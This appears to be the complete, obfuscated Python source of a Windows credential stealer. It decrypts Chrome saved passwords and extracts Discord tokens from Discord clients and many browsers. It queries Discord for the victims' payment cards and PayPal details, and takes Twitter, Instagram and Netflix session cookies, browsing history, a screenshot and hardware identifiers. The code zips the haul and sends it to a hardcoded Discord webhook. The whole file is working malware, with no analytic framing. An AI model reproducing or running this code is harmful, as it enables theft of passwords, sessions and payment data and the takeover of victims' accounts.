import os #line:1
import sys #line:2
import win32con #line:3
import browser_cookie3 #line:4
from json import loads ,dumps #line:5
from base64 import b64decode #line:6
from sqlite3 import connect #line:7
from shutil import copyfile #line:8
from threading import Thread #line:9
from win32crypt import CryptUnprotectData #line:10
from Crypto .Cipher import AES #line:11
from discord_webhook import DiscordEmbed ,DiscordWebhook #line:12
from subprocess import Popen ,PIPE #line:13
from urllib .request import urlopen ,Request #line:14
from requests import get #line:15
from re import findall ,search #line:16
from win32api import SetFileAttributes ,GetSystemMetrics #line:17
from browser_history import get_history #line:18
from prettytable import PrettyTable #line:19
from platform import platform #line:20
from getmac import get_mac_address as gma #line:21
from psutil import virtual_memory #line:22
from collections import defaultdict #line:23
from zipfile import ZipFile ,ZIP_DEFLATED #line:24
from cpuinfo import get_cpu_info #line:25
from multiprocessing import freeze_support #line:26
from tempfile import TemporaryDirectory #line:27
from pyautogui import screenshot #line:28
from random import choices #line:29
from string import ascii_letters ,digits #line:30
import socket #line:31
hostname =socket .gethostname ()#line:33
narcis =socket .gethostbyname (hostname )#line:34
website =["discord.com","twitter.com","instagram.com","netflix.com"]#line:37
def get_screenshot (OOOOO0O00OOO00O00 ):#line:40
    get_screenshot .scrn =screenshot ()#line:41
    get_screenshot .scrn_path =os .path .join (OOOOO0O00OOO00O00 ,f"Screenshot_{''.join(choices(list(ascii_letters + digits), k=5))}.png")#line:44
    get_screenshot .scrn .save (get_screenshot .scrn_path )#line:45
def get_hwid ():#line:48
    O00O0000OO0OOO00O =Popen ("wmic csproduct get uuid",shell =True ,stdout =PIPE ,stderr =PIPE )#line:49
    return (O00O0000OO0OOO00O .stdout .read ()+O00O0000OO0OOO00O .stderr .read ()).decode ().split ("\n")[1 ]#line:50
def get_user_data (O0O0OO00OOOO00000 ):#line:53
    O0000OO0OOO00O0OO ={"Authorization":O0O0OO00OOOO00000 }#line:54
    OOO0000OO00OOO0OO =get ("https://discordapp.com/api/v6/users/@me",headers =O0000OO0OOO00O0OO ).json ()#line:55
    return [OOO0000OO00OOO0OO ["username"],OOO0000OO00OOO0OO ["discriminator"],OOO0000OO00OOO0OO ["email"],OOO0000OO00OOO0OO ["phone"],]#line:61
def has_payment_methods (O000OOO0OO0O0OOO0 ):#line:64
    O00OOO000O0O000O0 ={"Authorization":O000OOO0OO0O0OOO0 }#line:65
    O0O0OO0OO0O0000O0 =get ("https://discordapp.com/api/v6/users/@me/billing/payment-sources",headers =O00OOO000O0O000O0 ,).json ()#line:69
    return O0O0OO0OO0O0000O0 #line:70
def cookies_grabber_mod (O0OOO0000OO000OOO ):#line:73
    OO00000O00OO0O000 =[]#line:74
    O000OO0O000O0OO0O =["chrome","edge","firefox","brave","opera","vivaldi","chromium"]#line:75
    for O0OOO000OOOOOO0O0 in O000OO0O000O0OO0O :#line:76
        try :#line:77
            OO00000O00OO0O000 .append (str (getattr (browser_cookie3 ,O0OOO000OOOOOO0O0 )(domain_name =O0OOO0000OO000OOO )))#line:78
        except BaseException :#line:79
            pass #line:80
    return OO00000O00OO0O000 #line:81
def get_Personal_data ():#line:84
    try :#line:85
        OOO00OOOO0OOOOO0O =urlopen (Request ("https://api64.ipify.org")).read ().decode ().strip ()#line:86
        OOO0O0O0000O0O000 =(urlopen (Request (f"https://ipapi.co/{OOO00OOOO0OOOOO0O}/country_name")).read ().decode ().strip ())#line:92
        OO00000O0OO000O00 =(urlopen (Request (f"https://ipapi.co/{OOO00OOOO0OOOOO0O}/city")).read ().decode ().strip ())#line:98
    except BaseException :#line:99
        OO00000O0OO000O00 ="404"#line:100
        OOO0O0O0000O0O000 ="404"#line:101
        OOO00OOOO0OOOOO0O ="404"#line:102
    return [OOO00OOOO0OOOOO0O ,OOO0O0O0000O0O000 ,OO00000O0OO000O00 ]#line:103
def find_His ():#line:106
    OO0OO0OO0OO000O0O =PrettyTable (padding_width =1 )#line:107
    OO0OO0OO0OO000O0O .field_names =["CurrentTime","Link"]#line:108
    for OOO00OO00O0OO00O0 in get_history ().histories :#line:109
        OOOOO0000OO00OO00 ,O0O00OOOO0OOOOO00 =OOO00OO00O0OO00O0 #line:110
        if len (O0O00OOOO0OOOOO00 )<=100 :#line:111
            OO0OO0OO0OO000O0O .add_row ([OOOOO0000OO00OO00 ,O0O00OOOO0OOOOO00 ])#line:112
        else :#line:113
            OO0OOOO0O00OO0O00 =O0O00OOOO0OOOOO00 .split ("//")#line:114
            O0OO00O0OOOOOO0OO ,OO00OOO0O000O000O =OO0OOOO0O00OO0O00 [1 ].count ("/"),OO0OOOO0O00OO0O00 [1 ].split ("/")#line:115
            if OO00OOO0O000O000O [0 ]!="www.google.com":#line:116
                if O0OO00O0OOOOOO0OO <=5 :#line:117
                    O0O00OOOO0OOOOO00 =f"{OO0OOOO0O00OO0O00[0]}//"#line:118
                    for O000O0OO0OO00OOOO in OO00OOO0O000O000O :#line:119
                        if OO00OOO0O000O000O .index (O000O0OO0OO00OOOO )!=len (OO00OOO0O000O000O )-1 :#line:120
                            O0O00OOOO0OOOOO00 +=f"{O000O0OO0OO00OOOO}/"#line:121
                    if len (O0O00OOOO0OOOOO00 )<=100 :#line:122
                        OO0OO0OO0OO000O0O .add_row ([OOOOO0000OO00OO00 ,O0O00OOOO0OOOOO00 ])#line:123
                    else :#line:124
                        OO0OO0OO0OO000O0O .add_row ([OOOOO0000OO00OO00 ,f"{OO0OOOO0O00OO0O00[0]}//{OO00OOO0O000O000O[0]}/[...]"])#line:125
                else :#line:126
                    O0O00OOOO0OOOOO00 =f"{OO0OOOO0O00OO0O00[0]}//{OO00OOO0O000O000O[0]}/[...]"#line:127
                    if len (O0O00OOOO0OOOOO00 )<=100 :#line:128
                        OO0OO0OO0OO000O0O .add_row ([OOOOO0000OO00OO00 ,O0O00OOOO0OOOOO00 ])#line:129
                    else :#line:130
                        OO0OO0OO0OO000O0O .add_row ([OOOOO0000OO00OO00 ,f"{OO0OOOO0O00OO0O00[0]}//{OO00OOO0O000O000O[0]}/[...]"])#line:131
    return OO0OO0OO0OO000O0O .get_string ()#line:132
def get_encryption_key ():#line:135
    O0O0OOOO000O0O00O =os .path .join (os .environ ["USERPROFILE"],"AppData","Local","Google","Chrome","User Data","Local State",)#line:144
    with open (O0O0OOOO000O0O00O ,"r",encoding ="utf-8")as O0OO00O0OOOOOO00O :#line:145
        OO00O00O00OO0O00O =loads (O0OO00O0OOOOOO00O .read ())#line:146
    return CryptUnprotectData (b64decode (OO00O00O00OO0O00O ["os_crypt"]["encrypted_key"])[5 :],None ,None ,None ,0 )[1 ]#line:149
def decrypt_data (O0O0OO0OO00OOO000 ,O0O0OOO0000OOOO0O ):#line:152
    try :#line:153
        return (AES .new (CryptUnprotectData (O0O0OOO0000OOOO0O ,None ,None ,None ,0 )[1 ],AES .MODE_GCM ,O0O0OO0OO00OOO000 [3 :15 ],).decrypt (O0O0OO0OO00OOO000 [15 :])[:-16 ].decode ())#line:162
    except BaseException :#line:163
        try :#line:164
            return str (CryptUnprotectData (O0O0OO0OO00OOO000 ,None ,None ,None ,0 )[1 ])#line:165
        except BaseException :#line:166
            return ""#line:167
def main (OOOOO00O0000OOOO0 ):#line:170
    OO0O0OOOO00OO0000 =os .path .join (os .environ ["USERPROFILE"],"AppData","Local","Google","Chrome","User Data","default","Login Data",)#line:180
    O0000000O0OOOO0OO =[]#line:181
    if os .path .exists (OO0O0OOOO00OO0000 ):#line:182
        OO0O0OOO0OO0000O0 =get_encryption_key ()#line:183
        O0O0O0OOOOO0O0OOO =os .path .join (OOOOO00O0000OOOO0 ,"ChromeData.db")#line:184
        copyfile (OO0O0OOOO00OO0000 ,O0O0O0OOOOO0O0OOO )#line:185
        O0O0000O00OOO00OO =connect (O0O0O0OOOOO0O0OOO )#line:186
        OO000000OOO00O00O =O0O0000O00OOO00OO .cursor ()#line:187
        OO000000OOO00O00O .execute ("SELECT origin_url, username_value, password_value FROM logins")#line:188
        O0000000O0OOOO0OO =[]#line:189
        for O0OOO0O0OOO0O0000 ,O0O0OOOO00OO0OOO0 ,OOOOO00OO0O000OOO in OO000000OOO00O00O .fetchall ():#line:190
            O0OOO0OO0OO0OOO00 =decrypt_data (OOOOO00OO0O000OOO ,OO0O0OOO0OO0000O0 )#line:191
            if O0OOO0OO0OO0OOO00 :#line:192
                O0000000O0OOOO0OO .append ([O0O0OOOO00OO0OOO0 ,O0OOO0OO0OO0OOO00 ,O0OOO0O0OOO0O0000 ])#line:193
        OO000000OOO00O00O .close ()#line:194
        O0O0000O00OOO00OO .close ()#line:195
    for OOOO00O0OOO0O00O0 in website :#line:197
        if OOOO00O0OOO0O00O0 ==website [0 ]:#line:198
            O0O0OO0OO0OO0OO00 =[]#line:199
            OOOOO0OO0OO00O000 =[]#line:200
            def O000OO000OO0O0O0O (OO00OO0OO000O0O0O ):#line:202
                try :#line:203
                    with open (os .path .join (OO00OO0OO000O0O0O ,"Local State"),"r")as O0O0O0O0O000O0OOO :#line:204
                        O0OOO00O0O00OO000 =loads (O0O0O0O0O000O0OOO .read ())["os_crypt"]["encrypted_key"]#line:205
                        O0O0O0O0O000O0OOO .close ()#line:206
                except :#line:207
                    pass #line:208
                for O0O0O0O0O000O0OOO in os .listdir (os .path .join (OO00OO0OO000O0O0O ,"Local Storage","leveldb")):#line:210
                    if not O0O0O0O0O000O0OOO .endswith (".ldb")and O0O0O0O0O000O0OOO .endswith (".log"):#line:211
                        pass #line:212
                    else :#line:213
                        try :#line:214
                            with open (os .path .join (OO00OO0OO000O0O0O ,"Local Storage","leveldb",O0O0O0O0O000O0OOO ),"r",errors ="ignore",)as OO00000000OOO000O :#line:219
                                for OO0O00OOOOO0OO000 in OO00000000OOO000O .readlines ():#line:220
                                    OO0O00OOOOO0OO000 .strip ()#line:221
                                    for O0O0OOOO0OO00OOOO in findall (r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*",OO0O00OOOOO0OO000 ):#line:224
                                        O0O0OO0OO0OO0OO00 .append (O0O0OOOO0OO00OOOO )#line:225
                        except :#line:226
                            pass #line:227
                for O0OO00O0O00O0O00O in O0O0OO0OO0OO0OO00 :#line:228
                    if O0OO00O0O00O0O00O .endswith ("\\"):#line:229
                        O0OO00O0O00O0O00O .replace ("\\","")#line:230
                    elif O0OO00O0O00O0O00O not in OOOOO0OO0OO00O000 :#line:231
                        OOOOO0OO0OO00O000 .append (O0OO00O0O00O0O00O )#line:232
                for OOO000O00OO0O0O00 in OOOOO0OO0OO00O000 :#line:233
                    try :#line:234
                        O0O0OO0OO0OO0OO00 .append (decrypt_data (b64decode (OOO000O00OO0O0O00 .split ("dQw4w9WgXcQ:")[1 ]),b64decode (O0OOO00O0O00OO000 )[5 :],))#line:240
                    except :#line:241
                        pass #line:242
            O0000O0O0O00O0O0O =os .getenv ("LOCALAPPDATA")#line:244
            O00O0OOOOO0OOOOO0 =os .getenv ("APPDATA")#line:245
            O000O00O0OOO0OO0O =[os .path .join (O00O0OOOOO0OOOOO0 ,"discord"),os .path .join (O00O0OOOOO0OOOOO0 ,"discordcanary"),os .path .join (O00O0OOOOO0OOOOO0 ,"Lightcord"),os .path .join (O00O0OOOOO0OOOOO0 ,"discordptb"),os .path .join (O00O0OOOOO0OOOOO0 ,"Opera Software","Opera Stable"),os .path .join (O00O0OOOOO0OOOOO0 ,"Opera Software","Opera GX Stable"),os .path .join (O0000O0O0O00O0O0O ,"Amigo","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Torch","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Kometa","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Orbitum","User Data"),os .path .join (O0000O0O0O00O0O0O ,"CentBrowser","User Data"),os .path .join (O0000O0O0O00O0O0O ,"7Star","7Star","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Sputnik","Sputnik","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Vivaldi","User Data","Default"),os .path .join (O0000O0O0O00O0O0O ,"Google","Chrome SxS","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Google","Chrome","User Data" "Default"),os .path .join (O0000O0O0O00O0O0O ,"Epic Privacy Browser","User Data"),os .path .join (O0000O0O0O00O0O0O ,"Microsoft","Edge","User Data","Default"),os .path .join (O0000O0O0O00O0O0O ,"uCozMedia","Uran","User Data","Default"),os .path .join (O0000O0O0O00O0O0O ,"Yandex","YandexBrowser","User Data","Default"),os .path .join (O0000O0O0O00O0O0O ,"BraveSoftware","Brave-Browser","User Data","Default"),os .path .join (O0000O0O0O00O0O0O ,"Iridium","User Data","Default"),]#line:271
            OOO00OO0000O00000 =[]#line:273
            def O0OOO0OOOO000OO0O (O00OO0O0O0O0OOOO0 ):#line:275
                if os .path .exists (O00OO0O0O0O0OOOO0 ):#line:276
                    OOO00OO0000O00000 .append (Thread (target =O000OO000OO0O0O0O ,args =(O00OO0O0O0O0OOOO0 ,)))#line:277
            for OOO0O0000OOOO0OOO in O000O00O0OOO0OO0O :#line:279
                O0OOO0OOOO000OO0O (OOO0O0000OOOO0OOO )#line:280
            for OO0000000OOO000O0 in OOO00OO0000O00000 :#line:281
                OO0000000OOO000O0 .start ()#line:282
                OO0000000OOO000O0 .join ()#line:283
        elif OOOO00O0OOO0O00O0 ==website [1 ]:#line:284
            OO00O0OOOO0OOOO0O ,OOO0O0O000O00O000 =([]for _OO0OOOO0OOOO0OO00 in range (2 ))#line:285
            for OO0OO00OOOO0O0O0O in cookies_grabber_mod (OOOO00O0OOO0O00O0 ):#line:286
                OO00O0OOOO0OOOO0O .append (OO0OO00OOOO0O0O0O .split (", "))#line:287
            for OO00O000O00000O0O in OO00O0OOOO0OOOO0O :#line:288
                for O0O0OO0OOOOOO000O in OO00O000O00000O0O :#line:289
                    if search (r"auth_token",O0O0OO0OOOOOO000O )is not None :#line:290
                        OOO0O0O000O00O000 .append (O0O0OO0OOOOOO000O .split (" ")[1 ].split ("=")[1 ])#line:291
        elif OOOO00O0OOO0O00O0 ==website [2 ]:#line:292
            O000O000O00000O00 ,OO0OOOOOOO0O00O0O =([]for _OOO00000OO000O0O0 in range (2 ))#line:293
            for OO0OO00OOOO0O0O0O in cookies_grabber_mod (OOOO00O0OOO0O00O0 ):#line:294
                O000O000O00000O00 .append (OO0OO00OOOO0O0O0O .split (", "))#line:295
            O0OOOOOO000OOOO0O =defaultdict (dict )#line:296
            for OO00O000O00000O0O in O000O000O00000O00 :#line:297
                if all ([search (r"ds_user_id",str (OO00O000O00000O0O ))is not None ,search (r"sessionid",str (OO00O000O00000O0O ))is not None ,]):#line:303
                    for O0O0OO0OOOOOO000O in OO00O000O00000O0O :#line:304
                        O0OO0O0OOOO00000O =[search (r"ds_user_id",O0O0OO0OOOOOO000O )is not None ,search (r"sessionid",O0O0OO0OOOOOO000O )is not None ,]#line:308
                        if any (O0OO0O0OOOO00000O ):#line:309
                            O0OOOOOO000OOOO0O [O000O000O00000O00 .index (OO00O000O00000O0O )][O0OO0O0OOOO00000O .index (True )]=O0O0OO0OOOOOO000O .split (" ")[1 ].split ("=")[1 ]#line:312
            for OOOOOOOO0O000O00O in list (dict (O0OOOOOO000OOOO0O ).keys ()):#line:313
                OO0OOOOOOO0O00O0O .append (list (dict (O0OOOOOO000OOOO0O )[OOOOOOOO0O000O00O ].items ()))#line:314
            for OOOOOOOO0O000O00O in OO0OOOOOOO0O00O0O :#line:315
                for O0O0OO0OOOOOO000O in OOOOOOOO0O000O00O :#line:316
                    if OOOOOOOO0O000O00O .index (O0O0OO0OOOOOO000O )!=O0O0OO0OOOOOO000O [0 ]:#line:317
                        OOOOOOOO0O000O00O [OOOOOOOO0O000O00O .index (O0O0OO0OOOOOO000O )],OOOOOOOO0O000O00O [O0O0OO0OOOOOO000O [0 ]]=OOOOOOOO0O000O00O [O0O0OO0OOOOOO000O [0 ]],OOOOOOOO0O000O00O [OOOOOOOO0O000O00O .index (O0O0OO0OOOOOO000O )]#line:318
            for OOOOOOOO0O000O00O in OO0OOOOOOO0O00O0O :#line:319
                for O0O0OO0OOOOOO000O in OOOOOOOO0O000O00O :#line:320
                    OOOOOOOO0O000O00O [OOOOOOOO0O000O00O .index (O0O0OO0OOOOOO000O )]=O0O0OO0OOOOOO000O [1 ]#line:321
        elif OOOO00O0OOO0O00O0 ==website [3 ]:#line:322
            OOOOO0OOO000OOOOO ,OO0OOO0O00O0OOOOO =([]for _O0OO00OO000O0O0O0 in range (2 ))#line:323
            for OO0OO00OOOO0O0O0O in cookies_grabber_mod (OOOO00O0OOO0O00O0 ):#line:324
                OOOOO0OOO000OOOOO .append (OO0OO00OOOO0O0O0O .split (", "))#line:325
            for OO00O000O00000O0O in OOOOO0OOO000OOOOO :#line:326
                for O0O0OO0OOOOOO000O in OO00O000O00000O0O :#line:327
                    if search (r"NetflixId",O0O0OO0OOOOOO000O )is not None :#line:328
                        OO0O0OO00OO0OOOO0 =O0O0OO0OOOOOO000O .split (" ")[1 ].split ("=")[1 ]#line:329
                        if len (OO0O0OO00OO0OOOO0 )>80 :#line:330
                            OO0OOO0O00O0OOOOO .append ([])#line:331
                            for O0O0OO0OOOOOO000O in OO00O000O00000O0O :#line:332
                                OO0OOO0O00O0OOOOO [-1 ].append ({"domain":f"{website[3]}","name":f"{O0O0OO0OOOOOO000O.split(' ')[1].split('=')[0]}","value":f"{O0O0OO0OOOOOO000O.split(' ')[1].split('=')[1]}",})#line:339
    O0OOO000O0OO0O0O0 =[]#line:340
    for OOOOOOOO0O000O00O in O0O0OO0OO0OO0OO00 :#line:341
        OO0000O00O0OOOO0O =has_payment_methods (OOOOOOOO0O000O00O )#line:342
        try :#line:343
            for O000O00O000O0000O in range (len (OO0000O00O0OOOO0O )):#line:344
                if OO0000O00O0OOOO0O [O000O00O000O0000O ]["type"]==1 :#line:345
                    O00OO0OO0OO00OOO0 =[OO0000O00O0OOOO0O [O000O00O000O0000O ]["brand"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["type"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["last_4"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["expires_month"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["expires_year"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["billing_address"],]#line:353
                    if O00OO0OO0OO00OOO0 not in O0OOO000O0OO0O0O0 :#line:354
                        O0OOO000O0OO0O0O0 .append (O00OO0OO0OO00OOO0 )#line:355
                elif OO0000O00O0OOOO0O [O000O00O000O0000O ]["type"]==2 :#line:356
                    OOOOO0000OOO0OOOO =[OO0000O00O0OOOO0O [O000O00O000O0000O ]["email"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["type"],OO0000O00O0OOOO0O [O000O00O000O0000O ]["billing_address"],]#line:361
                    if OOOOO0000OOO0OOOO not in O0OOO000O0OO0O0O0 :#line:362
                        O0OOO000O0OO0O0O0 .append (OOOOO0000OOO0OOOO )#line:363
        except BaseException :#line:364
            pass #line:365
    return [OOOOO0OO0OO00O000 ,list (set (OOO0O0O000O00O000 )),list (set (tuple (OOO0OO0O00OO0OOOO )for OOO0OO0O00OO0OOOO in OO0OOOOOOO0O00O0O )),O0OOO000O0OO0O0O0 ,O0000000O0OOOO0OO ,OO0OOO0O00O0OOOOO ,]#line:373
def send_webhook (OO00O0OO000O0OOO0 ):#line:376
    O0O00000000O0OO0O =get_Personal_data ()#line:377
    O00OO0O000O0OO0O0 =get_cpu_info ()#line:378
    with TemporaryDirectory (dir =".")as OOO00OOOO0000O0OO :#line:379
        SetFileAttributes (OOO00OOOO0000O0OO ,win32con .FILE_ATTRIBUTE_HIDDEN )#line:380
        get_screenshot (path =OOO00OOOO0000O0OO )#line:381
        OOO0000O00O0OOO0O =main (OOO00OOOO0000O0OO )#line:382
        OOO00O000000OOO0O ,O0O0O00OO00O00O0O ,OOOO000000O0O0OOO ,O0OOOOOOOO00OOOOO =(PrettyTable (padding_width =1 )for _O0O0OO0OO00000000 in range (4 ))#line:385
        (OOO00O000000OOO0O .field_names ,O0O0O00OO00O00O0O .field_names ,OOOO000000O0O0OOO .field_names ,O0OOOOOOOO00OOOOO .field_names ,O00OOOOO0OO00OOOO ,)=(["Discord Tokens","Username","Email","Phone"],["Twitter Tokens [auth_token]"],["ds_user_id","sessionid"],["Username / Email","password","website"],[],)#line:398
        for __OO0OO0O00O00O00O0 in OOO0000O00O0OOO0O [4 ]:#line:399
            O0OOOOOOOO00OOOOO .add_row (__OO0OO0O00O00O00O0 )#line:400
        for OOO00OO0OO000O0OO in OOO0000O00O0OOO0O [0 ]:#line:401
            try :#line:402
                OO0O0OOOO00O00O00 =get_user_data (OOO00OO0OO000O0OO )#line:403
                O0OOOO0OOO0O0OOOO ,OOOO0O0OOOO00OOO0 ,O0OOO0OO00000000O =f"{OO0O0OOOO00O00O00[0]}#{OO0O0OOOO00O00O00[1]}",OO0O0OOOO00O00O00 [2 ],OO0O0OOOO00O00O00 [3 ]#line:404
                OOO00O000000OOO0O .add_row ([OOO00OO0OO000O0OO ,O0OOOO0OOO0O0OOOO ,OOOO0O0OOOO00OOO0 ,O0OOO0OO00000000O ])#line:405
                O00OOOOO0OO00OOOO .append (OOO00OO0OO000O0OO )#line:406
            except BaseException :#line:407
                pass #line:408
        for _O0O0OO0OOO0OO0O00 in OOO0000O00O0OOO0O [1 ]:#line:409
            O0O0O00OO00O00O0O .add_row ([_O0O0OO0OOO0OO0O00 ])#line:410
        for _O00O0OOO0OO00O00O in OOO0000O00O0OOO0O [2 ]:#line:411
            OOOO000000O0O0OOO .add_row (_O00O0OOO0OO00O00O )#line:412
        OO0000000O000000O =[]#line:413
        for _O000O00O0OOO00OOO in OOO0000O00O0OOO0O [3 ]:#line:414
            if _O000O00O0OOO00OOO [1 ]==1 :#line:415
                O00OOO0OO0OO00OOO =PrettyTable (padding_width =1 )#line:416
                O00OOO0OO0OO00OOO .field_names =["Brand","Last 4","Type","Expiration","Billing Adress",]#line:423
                O00OOO0OO0OO00OOO .add_row ([_O000O00O0OOO00OOO [0 ],_O000O00O0OOO00OOO [2 ],"Debit or Credit Card",f"{_O000O00O0OOO00OOO[3]}/{_O000O00O0OOO00OOO[4]}",_O000O00O0OOO00OOO [5 ]])#line:426
                OO0000000O000000O .append (O00OOO0OO0OO00OOO .get_string ())#line:427
            elif _O000O00O0OOO00OOO [1 ]==2 :#line:428
                OOO0O00O0O000O000 =PrettyTable (padding_width =1 )#line:429
                OOO0O00O0O000O000 .field_names =["Email","Type","Billing Adress"]#line:430
                OOO0O00O0O000O000 .add_row ([_O000O00O0OOO00OOO [0 ],"Paypal",_O000O00O0OOO00OOO [2 ]])#line:431
                OO0000000O000000O .append (OOO0O00O0O000O000 .get_string ())#line:432
        O0OOOO00000O0O000 =[[os .path .join (OOO00OOOO0000O0OO ,"Discord.txt"),OOO00O000000OOO0O ],[os .path .join (OOO00OOOO0000O0OO ,"twitte.txt"),O0O0O00OO00O00O0O ],[os .path .join (OOO00OOOO0000O0OO ,"instagram.txt"),OOOO000000O0O0OOO ],[os .path .join (OOO00OOOO0000O0OO ,"passwords.txt"),O0OOOOOOOO00OOOOO ],]#line:438
        for OO0OOOOOO0O000000 ,OOO00OOOO00O00O0O in O0OOOO00000O0O000 :#line:439
            if ((OOO00OOOO00O00O0O ==O0OOOO00000O0O000 [0 ][1 ]and len (OOO0000O00O0OOO0O [0 ])!=0 )or (OOO00OOOO00O00O0O ==O0OOOO00000O0O000 [1 ][1 ]and len (OOO0000O00O0OOO0O [1 ])!=0 )or (OOO00OOOO00O00O0O ==O0OOOO00000O0O000 [2 ][1 ]and len (OOO0000O00O0OOO0O [2 ])!=0 )or (OOO00OOOO00O00O0O ==O0OOOO00000O0O000 [3 ][1 ]and len (OOO0000O00O0OOO0O [4 ])!=0 )):#line:445
                with open (OO0OOOOOO0O000000 ,"w")as O0O0O000O0O00OO0O :#line:446
                    O0O0O000O0O00OO0O .write (OOO00OOOO00O00O0O .get_string ())#line:447
        O000000OO0000OO00 =[os .path .join (OOO00OOOO0000O0OO ,"History.txt"),get_screenshot .scrn_path ,os .path .join (OOO00OOOO0000O0OO ,"payment.txt"),]#line:452
        for O00OO0O00OO0O0O00 in OOO0000O00O0OOO0O [5 ]:#line:453
            OO000OOO0O00000OO =os .path .join (OOO00OOOO0000O0OO ,f"netflix_{OOO0000O00O0OOO0O[5].index(O00OO0O00OO0O0O00)}.json")#line:454
            with open (OO000OOO0O00000OO ,"w")as O0O000000O0O0OO00 :#line:455
                O0O000000O0O0OO00 .write (dumps (O00OO0O00OO0O0O00 ,indent =4 ))#line:456
            O000000OO0000OO00 .append (OO000OOO0O00000OO )#line:457
        with open (O000000OO0000OO00 [0 ],"w")as O0O000000O0O0OO00 :#line:458
            O0O000000O0O0OO00 .write (find_His ())#line:459
        with ZipFile (os .path .join (OOO00OOOO0000O0OO ,"data.zip"),mode ="w",compression =ZIP_DEFLATED )as OOO000000O00OO00O :#line:462
            if ("payment_card"or "payment_p")in locals ():#line:463
                with open (O000000OO0000OO00 [2 ],"w")as O0O000000O0O0OO00 :#line:464
                    for OO0OOO00OOO0OOOOO in OO0000000O000000O :#line:465
                        O0O000000O0O0OO00 .write (f"{OO0OOO00OOO0OOOOO}\n")#line:466
            for O000O0000O0O000O0 in O000000OO0000OO00 :#line:467
                try :#line:468
                    OOO000000O00OO00O .write (O000O0000O0O000O0 )#line:469
                except FileNotFoundError :#line:470
                    pass #line:471
            for OO000O00OOO0O0000 ,_OOO0O0O000000O00O in O0OOOO00000O0O000 :#line:472
                if os .path .exists (OO000O00OOO0O0000 ):#line:473
                    OOO000000O00OO00O .write (OO000O00OOO0O0000 )#line:474
        for OOOOO00O000O000OO in OO00O0OO000O0OOO0 :#line:475
            OO000O000O0000O0O =DiscordWebhook (url =OOOOO00O000O000OO ,username =f"nazi",avatar_url ="https://cdn.discordapp.com/attachments/1121413584551944195/1121418563002044426/sticker.png",)#line:480
            O00OO0OOOO0000000 =DiscordEmbed (title =f"{narcis}, | {os.getenv('UserName')}",color ="ffffff")#line:481
            O00OO0OOOO0000000 .add_embed_field (name ="",value =f":seven:`PC Username:` *~~{os.getenv('UserName')}~~*\n:seven:`PC Name:` *~~{os.getenv('COMPUTERNAME')}~~*\n:seven:`OS:` *~~{platform()}~~*\n",inline =False ,)#line:486
            O00OO0OOOO0000000 .add_embed_field (name ="",value =f":six:`IP:` *~~{O0O00000000O0OO0O[0]}~~*\n:six:`Country:` *~~{O0O00000000O0OO0O[1]}~~* \n:six:`MAC:` *~~{gma()}~~*\n:six:`HWID:` *~~{get_hwid()}~~*\n",inline =False ,)#line:491
            with open (os .path .join (OOO00OOOO0000O0OO ,"data.zip"),"rb")as O0O000000O0O0OO00 :#line:492
                OO000O000O0000O0O .add_file (file =O0O000000O0O0OO00 .read (),filename =f"{narcis}.zip",)#line:496
            OO000O000O0000O0O .add_embed (O00OO0OOOO0000000 )#line:497
            OO000O000O0000O0O .execute ()#line:498
if __name__ =="__main__":#line:501
    freeze_support ()#line:502
    if len (sys .argv )==1 :#line:503
        send_webhook (["https://discord.com/api/webhooks/1121010911449198702/a8DkHy5ZXZKFExrGz5f95Q7N3nzf4Jt-YF5aqBTiZyHfYwYVlC2MHePk9HXc5YPc92ee"])#line:504
    else :#line:505
        del sys .argv [0 ]#line:506
        send_webhook (sys .argv )#line:507
